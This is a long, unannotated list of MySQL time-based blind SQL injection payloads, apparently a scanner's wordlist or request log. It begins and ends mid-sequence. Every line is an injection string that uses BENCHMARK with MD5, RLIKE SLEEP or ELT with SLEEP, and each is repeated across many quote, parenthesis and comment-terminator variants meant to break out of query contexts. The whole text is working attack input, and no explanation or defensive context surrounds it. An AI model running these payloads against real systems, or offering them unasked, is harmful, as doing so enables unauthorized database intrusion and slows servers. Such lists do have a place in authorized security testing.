")) AS KGkw WHERE 3889=3889 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
)) AS GZJd WHERE 9111=9111 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
') AS uRbq WHERE 3155=3155 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
") AS Jlab WHERE 2480=2480 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
) AS FTiq WHERE 6758=6758 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
'||(SELECT 'ARYM' FROM DUAL WHERE 3265=3265 AND 4041=BENCHMARK(15000000,MD5(0x46795478)))||'
'||(SELECT 'uBOT' WHERE 3308=3308 AND 4041=BENCHMARK(15000000,MD5(0x46795478)))||'
'+(SELECT BXKj WHERE 1218=1218 AND 4041=BENCHMARK(15000000,MD5(0x46795478)))+'
'+(SELECT 'ctAQ' WHERE 3335=3335 AND 4041=BENCHMARK(15000000,MD5(0x46795478)))+'
' IN BOOLEAN MODE) AND 4041=BENCHMARK(15000000,MD5(0x46795478))#
) OR 8706=BENCHMARK(15000000,MD5(0x6c475872))
') OR 8706=BENCHMARK(15000000,MD5(0x6c475872))
' OR 8706=BENCHMARK(15000000,MD5(0x6c475872))
" OR 8706=BENCHMARK(15000000,MD5(0x6c475872))
) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (2073=2073
)) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((2294=2294
))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (((8818=8818
 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))
') OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ('EzyR'='EzyR
')) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (('nyzb'='nyzb
'))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((('GVIJ'='GVIJ
' OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND 'dyrr'='dyrr
') OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ('EYQO' LIKE 'EYQO
')) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (('Eskq' LIKE 'Eskq
'))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((('ubMb' LIKE 'ubMb
' OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND 'EKIb' LIKE 'EKIb
") OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ("mUIO"="mUIO
")) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (("NeUF"="NeUF
"))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((("aPaj"="aPaj
" OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND "LrSB"="LrSB
") OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ("WGLu" LIKE "WGLu
")) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (("tdry" LIKE "tdry
"))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((("btUI" LIKE "btUI
" OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND "uLKm" LIKE "uLKm
%') OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ('%'='
%')) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (('%'='
%'))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((('%'='
%' OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND '%'='
%") OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ("%"="
%")) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (("%"="
%"))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((("%"="
%" OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND "%"="
%00') OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ('oViS'='oViS
%00')) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND (('ouqB'='ouqB
%00'))) OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND ((('LepJ'='LepJ
%00' OR 8706=BENCHMARK(15000000,MD5(0x6c475872)) AND 'RuCU'='RuCU
 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- Kwit
 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))# IpBq
') WHERE 4386=4386 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
") WHERE 7430=7430 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
) WHERE 8520=8520 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
' WHERE 6787=6787 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
" WHERE 2919=2919 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
 WHERE 4115=4115 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
')) AS Suob WHERE 4196=4196 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
")) AS ikVy WHERE 2494=2494 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
)) AS QvAo WHERE 3111=3111 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
') AS GnVt WHERE 5435=5435 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
") AS GEJh WHERE 6837=6837 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
) AS pjEM WHERE 4623=4623 OR 8706=BENCHMARK(15000000,MD5(0x6c475872))-- 
'||(SELECT 'NhTc' FROM DUAL WHERE 2901=2901 OR 8706=BENCHMARK(15000000,MD5(0x6c475872)))||'
'||(SELECT 'HNJR' WHERE 6292=6292 OR 8706=BENCHMARK(15000000,MD5(0x6c475872)))||'
'+(SELECT VvTO WHERE 2809=2809 OR 8706=BENCHMARK(15000000,MD5(0x6c475872)))+'
'+(SELECT 'rMPC' WHERE 1253=1253 OR 8706=BENCHMARK(15000000,MD5(0x6c475872)))+'
' IN BOOLEAN MODE) OR 8706=BENCHMARK(15000000,MD5(0x6c475872))#
) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
') AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
' AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
" AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
)) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
')) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
'))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
") AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
")) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
"))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%') AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%')) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%'))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%' AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%") AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%")) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%"))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%" AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%00') AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%00')) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%00'))) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
%00' AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
') WHERE 8634=8634 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
") WHERE 1389=1389 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
) WHERE 7829=7829 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
' WHERE 9878=9878 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
" WHERE 8391=8391 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
 WHERE 4907=4907 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
')) AS eBlt WHERE 6337=6337 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
")) AS Xhsd WHERE 8914=8914 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
)) AS NKKi WHERE 1271=1271 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
') AS CcwY WHERE 4691=4691 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
") AS XtBA WHERE 9938=9938 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
) AS ligB WHERE 5806=5806 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
'||(SELECT 'Oidk' FROM DUAL WHERE 4481=4481 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
'||(SELECT 'obQt' WHERE 2265=2265 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
'+(SELECT PLOw WHERE 4140=4140 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
'+(SELECT 'tkQl' WHERE 5522=5522 AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
' IN BOOLEAN MODE) AND 7053=BENCHMARK(15000000,MD5(0x5a677274))#
) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
') OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
' OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
" OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
)) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
')) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
'))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
") OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
")) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
"))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%') OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%')) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%'))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%' OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%") OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%")) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%"))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%" OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%00') OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%00')) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%00'))) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
%00' OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
') WHERE 9806=9806 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
") WHERE 6889=6889 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
) WHERE 1125=1125 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
' WHERE 8286=8286 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
" WHERE 2198=2198 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
 WHERE 4026=4026 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
')) AS deuQ WHERE 8242=8242 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
")) AS XUtm WHERE 4161=4161 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
)) AS CwET WHERE 7163=7163 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
') AS qGkD WHERE 4591=4591 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
") AS LaCv WHERE 4459=4459 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
) AS zkKT WHERE 6207=6207 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
'||(SELECT 'LkNY' FROM DUAL WHERE 9387=9387 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
'||(SELECT 'MfJZ' WHERE 5123=5123 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
'+(SELECT gHUE WHERE 6309=6309 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
'+(SELECT 'Nqbe' WHERE 1606=1606 OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
' IN BOOLEAN MODE) OR 1930=BENCHMARK(15000000,MD5(0x706f4d6e))#
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (1161=1161
)) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((9858=9858
))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (((5508=5508
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ('AWpU'='AWpU
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (('ZCrb'='ZCrb
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((('wUrC'='wUrC
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND 'KYdV'='KYdV
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ('azds' LIKE 'azds
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (('XSou' LIKE 'XSou
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((('wKZL' LIKE 'wKZL
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND 'qREj' LIKE 'qREj
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ("XPVp"="XPVp
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (("Tbib"="Tbib
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((("ZBri"="ZBri
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND "MzsI"="MzsI
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ("KYhZ" LIKE "KYhZ
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (("ZjkK" LIKE "ZjkK
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((("qrdI" LIKE "qrdI
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND "RPfN" LIKE "RPfN
%') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ('%'='
%')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (('%'='
%'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((('%'='
%' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND '%'='
%") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ("%"="
%")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (("%"="
%"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((("%"="
%" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND "%"="
%00') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ('qKzU'='qKzU
%00')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND (('LCYA'='LCYA
%00'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND ((('sOIg'='sOIg
%00' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe) AND 'JbOw'='JbOw
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- HjyB
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)# zItp
') WHERE 3298=3298 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
") WHERE 2848=2848 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
) WHERE 7471=7471 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
' WHERE 3894=3894 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
" WHERE 9659=9659 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
 WHERE 8290=8290 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
')) AS omnO WHERE 6946=6946 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
")) AS pRyp WHERE 8026=8026 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
)) AS YFkG WHERE 7412=7412 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
') AS OfrA WHERE 6886=6886 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
") AS qcQc WHERE 1432=1432 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
) AS bJMt WHERE 1397=1397 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)-- 
'||(SELECT 'xCWQ' FROM DUAL WHERE 9502=9502 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe))||'
'||(SELECT 'TRsn' WHERE 4268=4268 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe))||'
'+(SELECT ffXz WHERE 3429=3429 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe))+'
'+(SELECT 'XQhW' WHERE 1772=1772 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe))+'
' IN BOOLEAN MODE) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))bGNe)#
) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
)) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%") RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%")) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%"))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%" RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%00') RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%00')) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%00'))) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
%00' RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
') WHERE 4178=4178 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
") WHERE 5189=5189 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
) WHERE 2462=2462 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
' WHERE 3372=3372 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
" WHERE 3080=3080 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
 WHERE 6446=6446 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
')) AS ygen WHERE 2891=2891 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
")) AS QeWj WHERE 2743=2743 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
)) AS sdrm WHERE 9298=9298 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
') AS OBqq WHERE 1917=1917 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
") AS xvSs WHERE 9894=9894 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
) AS VVOF WHERE 1802=1802 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
'||(SELECT 'YCDq' FROM DUAL WHERE 2034=2034 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
'||(SELECT 'XMIc' WHERE 5230=5230 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
'+(SELECT IEpp WHERE 1083=1083 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
'+(SELECT 'zcXn' WHERE 2122=2122 RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
' IN BOOLEAN MODE) RLIKE (SELECT * FROM (SELECT(SLEEP(15)))lXzQ)#
) RLIKE SLEEP(15)
') RLIKE SLEEP(15)
' RLIKE SLEEP(15)
" RLIKE SLEEP(15)
) RLIKE SLEEP(15) AND (5184=5184
)) RLIKE SLEEP(15) AND ((5520=5520
))) RLIKE SLEEP(15) AND (((5016=5016
 RLIKE SLEEP(15)
') RLIKE SLEEP(15) AND ('mCUg'='mCUg
')) RLIKE SLEEP(15) AND (('roaO'='roaO
'))) RLIKE SLEEP(15) AND ((('kGBO'='kGBO
' RLIKE SLEEP(15) AND 'vjeZ'='vjeZ
') RLIKE SLEEP(15) AND ('OdGg' LIKE 'OdGg
')) RLIKE SLEEP(15) AND (('rOCB' LIKE 'rOCB
'))) RLIKE SLEEP(15) AND ((('ukvt' LIKE 'ukvt
' RLIKE SLEEP(15) AND 'qJpy' LIKE 'qJpy
") RLIKE SLEEP(15) AND ("asPu"="asPu
")) RLIKE SLEEP(15) AND (("nHSH"="nHSH
"))) RLIKE SLEEP(15) AND ((("zABR"="zABR
" RLIKE SLEEP(15) AND "VDHb"="VDHb
") RLIKE SLEEP(15) AND ("oHmZ" LIKE "oHmZ
")) RLIKE SLEEP(15) AND (("hMTU" LIKE "hMTU
"))) RLIKE SLEEP(15) AND ((("ZIJI" LIKE "ZIJI
" RLIKE SLEEP(15) AND "AjdT" LIKE "AjdT
%') RLIKE SLEEP(15) AND ('%'='
%')) RLIKE SLEEP(15) AND (('%'='
%'))) RLIKE SLEEP(15) AND ((('%'='
%' RLIKE SLEEP(15) AND '%'='
%") RLIKE SLEEP(15) AND ("%"="
%")) RLIKE SLEEP(15) AND (("%"="
%"))) RLIKE SLEEP(15) AND ((("%"="
%" RLIKE SLEEP(15) AND "%"="
%00') RLIKE SLEEP(15) AND ('gLKU'='gLKU
%00')) RLIKE SLEEP(15) AND (('nlfV'='nlfV
%00'))) RLIKE SLEEP(15) AND ((('JuUg'='JuUg
%00' RLIKE SLEEP(15) AND 'KdGB'='KdGB
 RLIKE SLEEP(15)-- IuCs
 RLIKE SLEEP(15)# tsuP
') WHERE 4776=4776 RLIKE SLEEP(15)-- 
") WHERE 4227=4227 RLIKE SLEEP(15)-- 
) WHERE 7893=7893 RLIKE SLEEP(15)-- 
' WHERE 8980=8980 RLIKE SLEEP(15)-- 
" WHERE 1946=1946 RLIKE SLEEP(15)-- 
 WHERE 1714=1714 RLIKE SLEEP(15)-- 
')) AS SamZ WHERE 3800=3800 RLIKE SLEEP(15)-- 
")) AS EFTc WHERE 9728=9728 RLIKE SLEEP(15)-- 
)) AS jBZg WHERE 4951=4951 RLIKE SLEEP(15)-- 
') AS WMMA WHERE 9811=9811 RLIKE SLEEP(15)-- 
") AS mWVN WHERE 3496=3496 RLIKE SLEEP(15)-- 
) AS oPZj WHERE 2272=2272 RLIKE SLEEP(15)-- 
'||(SELECT 'JbPU' FROM DUAL WHERE 4249=4249 RLIKE SLEEP(15))||'
'||(SELECT 'kriK' WHERE 7029=7029 RLIKE SLEEP(15))||'
'+(SELECT DXyJ WHERE 9187=9187 RLIKE SLEEP(15))+'
'+(SELECT 'JzBx' WHERE 4349=4349 RLIKE SLEEP(15))+'
' IN BOOLEAN MODE) RLIKE SLEEP(15)#
) RLIKE SLEEP(15)#
') RLIKE SLEEP(15)#
' RLIKE SLEEP(15)#
" RLIKE SLEEP(15)#
)) RLIKE SLEEP(15)#
))) RLIKE SLEEP(15)#
 RLIKE SLEEP(15)#
')) RLIKE SLEEP(15)#
'))) RLIKE SLEEP(15)#
") RLIKE SLEEP(15)#
")) RLIKE SLEEP(15)#
"))) RLIKE SLEEP(15)#
%') RLIKE SLEEP(15)#
%')) RLIKE SLEEP(15)#
%'))) RLIKE SLEEP(15)#
%' RLIKE SLEEP(15)#
%") RLIKE SLEEP(15)#
%")) RLIKE SLEEP(15)#
%"))) RLIKE SLEEP(15)#
%" RLIKE SLEEP(15)#
%00') RLIKE SLEEP(15)#
%00')) RLIKE SLEEP(15)#
%00'))) RLIKE SLEEP(15)#
%00' RLIKE SLEEP(15)#
') WHERE 5981=5981 RLIKE SLEEP(15)#
") WHERE 1190=1190 RLIKE SLEEP(15)#
) WHERE 3631=3631 RLIKE SLEEP(15)#
' WHERE 2667=2667 RLIKE SLEEP(15)#
" WHERE 6099=6099 RLIKE SLEEP(15)#
 WHERE 5519=5519 RLIKE SLEEP(15)#
')) AS oFjW WHERE 7112=7112 RLIKE SLEEP(15)#
")) AS plPg WHERE 6483=6483 RLIKE SLEEP(15)#
)) AS ZeHZ WHERE 9543=9543 RLIKE SLEEP(15)#
') AS vVLg WHERE 3879=3879 RLIKE SLEEP(15)#
") AS kerH WHERE 9928=9928 RLIKE SLEEP(15)#
) AS UEAD WHERE 1056=1056 RLIKE SLEEP(15)#
'||(SELECT 'XTZp' FROM DUAL WHERE 6933=6933 RLIKE SLEEP(15)#
'||(SELECT 'Fnsl' WHERE 5227=5227 RLIKE SLEEP(15)#
'+(SELECT OXWI WHERE 5073=5073 RLIKE SLEEP(15)#
'+(SELECT 'iOih' WHERE 5917=5917 RLIKE SLEEP(15)#
) AND ELT(6308=6308,SLEEP(15))
') AND ELT(6308=6308,SLEEP(15))
' AND ELT(6308=6308,SLEEP(15))
" AND ELT(6308=6308,SLEEP(15))
) AND ELT(6308=6308,SLEEP(15)) AND (7838=7838
)) AND ELT(6308=6308,SLEEP(15)) AND ((1498=1498
))) AND ELT(6308=6308,SLEEP(15)) AND (((5405=5405
 AND ELT(6308=6308,SLEEP(15))
') AND ELT(6308=6308,SLEEP(15)) AND ('uzHl'='uzHl
')) AND ELT(6308=6308,SLEEP(15)) AND (('zxkb'='zxkb
'))) AND ELT(6308=6308,SLEEP(15)) AND ((('qShX'='qShX
' AND ELT(6308=6308,SLEEP(15)) AND 'KTrh'='KTrh
') AND ELT(6308=6308,SLEEP(15)) AND ('ekaS' LIKE 'ekaS
')) AND ELT(6308=6308,SLEEP(15)) AND (('PxkO' LIKE 'PxkO
'))) AND ELT(6308=6308,SLEEP(15)) AND ((('tKzC' LIKE 'tKzC
' AND ELT(6308=6308,SLEEP(15)) AND 'sTyt' LIKE 'sTyt
") AND ELT(6308=6308,SLEEP(15)) AND ("PHfI"="PHfI
")) AND ELT(6308=6308,SLEEP(15)) AND (("ZNjX"="ZNjX
"))) AND ELT(6308=6308,SLEEP(15)) AND ((("TYef"="TYef
" AND ELT(6308=6308,SLEEP(15)) AND "bpVx"="bpVx
") AND ELT(6308=6308,SLEEP(15)) AND ("GNqM" LIKE "GNqM
")) AND ELT(6308=6308,SLEEP(15)) AND (("DvNz" LIKE "DvNz
"))) AND ELT(6308=6308,SLEEP(15)) AND ((("CqOi" LIKE "CqOi
" AND ELT(6308=6308,SLEEP(15)) AND "wMVu" LIKE "wMVu
%') AND ELT(6308=6308,SLEEP(15)) AND ('%'='
%')) AND ELT(6308=6308,SLEEP(15)) AND (('%'='
%'))) AND ELT(6308=6308,SLEEP(15)) AND ((('%'='
%' AND ELT(6308=6308,SLEEP(15)) AND '%'='
%") AND ELT(6308=6308,SLEEP(15)) AND ("%"="
%")) AND ELT(6308=6308,SLEEP(15)) AND (("%"="
%"))) AND ELT(6308=6308,SLEEP(15)) AND ((("%"="
%" AND ELT(6308=6308,SLEEP(15)) AND "%"="
%00') AND ELT(6308=6308,SLEEP(15)) AND ('Qqen'='Qqen
%00')) AND ELT(6308=6308,SLEEP(15)) AND (('uKxb'='uKxb
%00'))) AND ELT(6308=6308,SLEEP(15)) AND ((('dVcQ'='dVcQ
%00' AND ELT(6308=6308,SLEEP(15)) AND 'DEUp'='DEUp
 AND ELT(6308=6308,SLEEP(15))-- sjPc
 AND ELT(6308=6308,SLEEP(15))# doiO
') WHERE 4374=4374 AND ELT(6308=6308,SLEEP(15))-- 
") WHERE 6174=6174 AND ELT(6308=6308,SLEEP(15))-- 
) WHERE 8755=8755 AND ELT(6308=6308,SLEEP(15))-- 
